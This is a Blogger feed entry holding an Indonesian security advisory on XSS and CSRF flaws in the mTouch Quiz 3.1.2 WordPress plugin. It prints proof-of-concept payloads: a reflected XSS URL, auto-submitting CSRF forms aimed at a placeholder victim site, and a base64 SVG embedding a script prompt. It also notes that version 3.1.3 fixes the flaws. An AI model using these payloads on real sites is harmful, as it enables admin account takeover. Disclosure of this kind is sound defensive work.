// API callback
av({"version":"1.0","encoding":"UTF-8","entry":{"xmlns":"http://www.w3.org/2005/Atom","xmlns$blogger":"http://schemas.google.com/blogger/2008","xmlns$georss":"http://www.georss.org/georss","xmlns$gd":"http://schemas.google.com/g/2005","xmlns$thr":"http://purl.org/syndication/thread/1.0","id":{"$t":"tag:blogger.com,1999:blog-4562681011204589043.post-8902529214724515730"},"published":{"$t":"2015-12-23T03:15:00.000+07:00"},"updated":{"$t":"2016-01-16T18:47:59.540+07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"vulnerabilities"}],"title":{"type":"text","$t":"Perhatikan Beberapa Celah di Plugin mTouch Quiz v3.1.2 WordPress!"},"content":{"type":"html","$t":"Apa itu mTouch Quiz ?, mTouch Quiz adalah Sebuah Plugins Wordpress yang memungkinkan anda menambahkan kuis ke situs anda.\u003Cbr \/\u003Etapi tahukah anda, banyak yang bilang tak ada keamanan sistem yang sempurna, karena yang menciptakan keamanan sistem adalah manusia yang jauh dari kata sempurna. Begitu Juga dengan plugins yang satu ini yang memiliki beberapa celah.\u003Cbr \/\u003E\u003Cbr \/\u003E\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003Ca href=\"http:\/\/1.bp.blogspot.com\/-ASm2oVbP1x8\/VnmrKuSdEiI\/AAAAAAAAAqQ\/_DbBLHh4VVs\/s1600\/mtouch-quiz-xss-1024x451.jpg\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg alt=\"XSS Vuln WP mTouch\" border=\"0\" height=\"281\" src=\"http:\/\/1.bp.blogspot.com\/-ASm2oVbP1x8\/VnmrKuSdEiI\/AAAAAAAAAqQ\/_DbBLHh4VVs\/s640\/mtouch-quiz-xss-1024x451.jpg\" title=\"Celah XSS Pada Plugins mTouch Wordpress\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\u003Cbr \/\u003E\u003Cb\u003EPlugins Review:\u003C\/b\u003E\u003Cbr \/\u003EPlugin link: \u003Ca href=\"https:\/\/wordpress.org\/plugins\/mtouch-quiz\/\" target=\"_blank\"\u003Ehttps:\/\/wordpress.org\/plugins\/mtouch-quiz\/\u003C\/a\u003E\u003Cbr \/\u003EActive Installs: 5,000+\u003Cbr \/\u003EVersion tested: 3.1.2\u003Cbr \/\u003ECVE Reference: Waiting\u003Cbr \/\u003E\u003Cbr \/\u003E\u003Cb\u003E1.\u0026nbsp;#1 Reflected XSS on Quiz Manage\u003C\/b\u003E\u003Cbr \/\u003EPada bagian parameter \"quiz\" itu cookie tidak di bersihkan sehingga memungkinkan hacker untuk memanipulasi URL dengan beberapa Query.\u003Cbr \/\u003E\u003Cblockquote class=\"tr_bq\"\u003E\u003Cb\u003E\u003Ci\u003EProof-of-concept:\u0026nbsp;\/wp-admin\/edit.php?page=mtouch-quiz%2Fquiz_form.php\u0026amp;quiz=1\"\u0026gt;\u0026lt;h1\u0026gt;XSS\u0026lt;\/h1\u0026gt;\u0026amp;action=edit\u003C\/i\u003E\u003C\/b\u003E\u003C\/blockquote\u003E\u003Cdiv\u003ELihatlah pada akhir halaman, dimana anda menemukan injeksi HTML.\u003C\/div\u003E\u003Cblockquote class=\"tr_bq\"\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"quiz\" value=\"1\\\"\u0026gt;\u0026lt;h1\u0026gt;XSS\u0026lt;\/h1\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003C\/blockquote\u003E\u003Cdiv\u003E\u003Cb\u003E\u003Ci\u003E\u003Cbr \/\u003E\u003C\/i\u003E\u003C\/b\u003E\u003C\/div\u003E\u003Cdiv\u003E\u003Cb\u003E2.\u0026nbsp;CSRF on General Options\u003C\/b\u003E\u003C\/div\u003E\u003Cdiv\u003E\u003Cdiv\u003EPada Plugin Pilihan umum tidak memiliki token keamanan (seperti wp_nonce) untuk mencegah serangan CSRF.\u003C\/div\u003E\u003Cdiv\u003EKita ambil contoh:\u0026nbsp;\u003C\/div\u003E\u003C\/div\u003E\u003Cdiv\u003E\u003Cblockquote class=\"tr_bq\"\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;form action=\"https:\/\/victims_website\/wp-admin\/options-general.php?page=mtouchquiz\" name=\"dsopas\" method=\"POST\"\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"mtq_hidden\" value=\"Y\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"left_delimiter\" value=\"\\(\\displaystyle{\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"right_delimiter\" value=\"}\\)\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"showalerts\" value=\"1\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"show_support\" value=\"1\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;\/form\u0026gt; \u0026lt;script\u0026gt; document.dsopas.submit(); \u0026lt;\/script\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003C\/blockquote\u003EJika admin Mengkonfirmasi mengunjungi halaman ini dengan kode HTML ini pengaturan nya akan berubah.\u003Cbr \/\u003E\u003Cbr \/\u003E\u003Cb\u003E3.\u0026nbsp;Add a question using CSRF and get a persistent XSS.\u003C\/b\u003E\u003Cbr \/\u003EIni adalah masalah penting. Jika admin mengkonfirmasi mengunjungi halaman dengan HTML ini, ia akan menambahkan pertanyaan dengan vektor XSS (di saya bukti-konsep dapat mendorong teks).\u003Cbr \/\u003E\u003Cbr \/\u003EJika Seorang pengguna yang jahat bisa menggunakan celah ini untuk menyebarkan malware, mengambil alih akun admin, dll ...\u003Cbr \/\u003E\u003Cblockquote class=\"tr_bq\"\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;form action=\"https:\/\/victims_website\/wp-admin\/edit.php?page=mtouch-quiz\/question.php\u0026amp;quiz=1\" name=\"dsopas\" method=\"POST\"\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"content\" value='\u0026lt;embed src=\"data:image\/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0PnByb21wdCgiWFNTIik7PC9zY3JpcHQ+PC9zdmc+\" type=\"image\/svg+xml\" width=\"300\" height=\"150\"\u0026gt;\u0026lt;\/embed\u0026gt;' \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"correct_answer[]\" value=\"1\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"answer[]\" value=\"test1\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"hint[]\" value=\"hint1\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"enclose_latex[]\" value=\"2\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"answer[]\" value=\"test2\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"enclose_latex[]\" value=\"2\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"hint[]\" value=\"hint2\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"answer[]\" value=\"\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"hint[]\" value=\"\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"answer[]\" value=\"\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"hint[]\" value=\"\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"answer[]\" value=\"\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"hint[]\" value=\"\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"explanation\" value=\"\u0026lt;h1\u0026gt;xss\u0026lt;\/h1\u0026gt;\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"point_value\" value=\"100\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"quiz\" value=\"1\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"question\" value=\"\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"user_ID\" value=\"1\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"action\" value=\"new\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"submit\" value=\"Save\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;\/form\u0026gt; \u0026lt;script\u0026gt; document.dsopas.submit(); \u0026lt;\/script\u0026gt;\u0026lt;form action=\"https:\/\/victims_website\/wp-admin\/edit.php?page=mtouch-quiz\/question.php\u0026amp;quiz=1\" name=\"dsopas\" method=\"POST\"\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"content\" value='\u0026lt;embed src=\"data:image\/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0PnByb21wdCgiWFNTIik7PC9zY3JpcHQ+PC9zdmc+\" type=\"image\/svg+xml\" width=\"300\" height=\"150\"\u0026gt;\u0026lt;\/embed\u0026gt;' \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"correct_answer[]\" value=\"1\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"answer[]\" value=\"test1\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"hint[]\" value=\"hint1\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"enclose_latex[]\" value=\"2\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"answer[]\" value=\"test2\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"enclose_latex[]\" value=\"2\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"hint[]\" value=\"hint2\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"answer[]\" value=\"\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"hint[]\" value=\"\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"answer[]\" value=\"\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"hint[]\" value=\"\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"answer[]\" value=\"\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"hint[]\" value=\"\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"explanation\" value=\"\u0026lt;h1\u0026gt;xss\u0026lt;\/h1\u0026gt;\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"point_value\" value=\"100\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"quiz\" value=\"1\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"question\" value=\"\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"user_ID\" value=\"1\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"action\" value=\"new\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;input type=\"hidden\" name=\"submit\" value=\"Save\" \/\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003Cb\u003E\u003Ci\u003E\u0026lt;\/form\u0026gt; \u0026lt;script\u0026gt; document.dsopas.submit(); \u0026lt;\/script\u0026gt;\u003C\/i\u003E\u003C\/b\u003E\u003C\/blockquote\u003E\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003Ca href=\"https:\/\/www.davidsopas.com\/wp-content\/uploads\/2015\/12\/mtouch-quiz-xss2.jpg\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg alt=\"mTouch XSS Vuln\" border=\"0\" height=\"196\" src=\"https:\/\/www.davidsopas.com\/wp-content\/uploads\/2015\/12\/mtouch-quiz-xss2.jpg\" title=\"XSS Example Wordpress\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\u003Cbr \/\u003E\u003Cb\u003E4.\u0026nbsp;Quiz Name XSS\u003C\/b\u003E\u003Cbr \/\u003EIni adalah masalah kecil tetapi jika tingkat pengguna lain memiliki akses ke sini, ia bisa mengubah nama kuis untuk vektor XSS dan mendapatkan XSS ke tingkat yang lebih.\u003Cbr \/\u003E\u003Cbr \/\u003ESolusi:\u003Cbr \/\u003E\u003Cbr \/\u003EVendor telah meluncurkan versi patch - 3.1.3. Juga dia cukup untuk menempatkan hal ini di dalam \u003Ca href=\"https:\/\/wordpress.org\/plugins\/mtouch-quiz\/changelog\/\" target=\"_blank\"\u003Echangelog\u003C\/a\u003E.\u003Cbr \/\u003E\u003Cbr \/\u003ENah, Apakah Anda memakai plugins tersebut ?.\u003Cbr \/\u003ETetap lah Waspada atas keamanan website anda. Jadi kan Website sebagai Aset penting anda dalam mengelola penghasilan anda.\u003Cbr \/\u003E\u003Cbr \/\u003EReferensi:\u0026nbsp;https:\/\/wpvulndb.com\/vulnerabilities\/8355\u003Cbr \/\u003E\u003Cbr \/\u003E\u003Cb\u003EBungker.co.id - Website Security Team\u003C\/b\u003E\u003C\/div\u003E\u003Cdiv class=\"blogger-post-footer\"\u003Ehttp:\/\/feeds.feedburner.com\/co\/mFdp\u003C\/div\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/www.bungker.co.id\/feeds\/8902529214724515730\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.bungker.co.id\/2015\/12\/perhatikan-beberapa-celah-di-plugin.html#comment-form","title":"4 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/4562681011204589043\/posts\/default\/8902529214724515730"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/4562681011204589043\/posts\/default\/8902529214724515730"},{"rel":"alternate","type":"text/html","href":"https:\/\/www.bungker.co.id\/2015\/12\/perhatikan-beberapa-celah-di-plugin.html","title":"Perhatikan Beberapa Celah di Plugin mTouch Quiz v3.1.2 WordPress!"}],"author":[{"name":{"$t":"Bungker Corp"},"uri":{"$t":"http:\/\/www.blogger.com\/profile\/14576039512366647631"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http:\/\/1.bp.blogspot.com\/-ASm2oVbP1x8\/VnmrKuSdEiI\/AAAAAAAAAqQ\/_DbBLHh4VVs\/s72-c\/mtouch-quiz-xss-1024x451.jpg","height":"72","width":"72"},"thr$total":{"$t":"4"}}});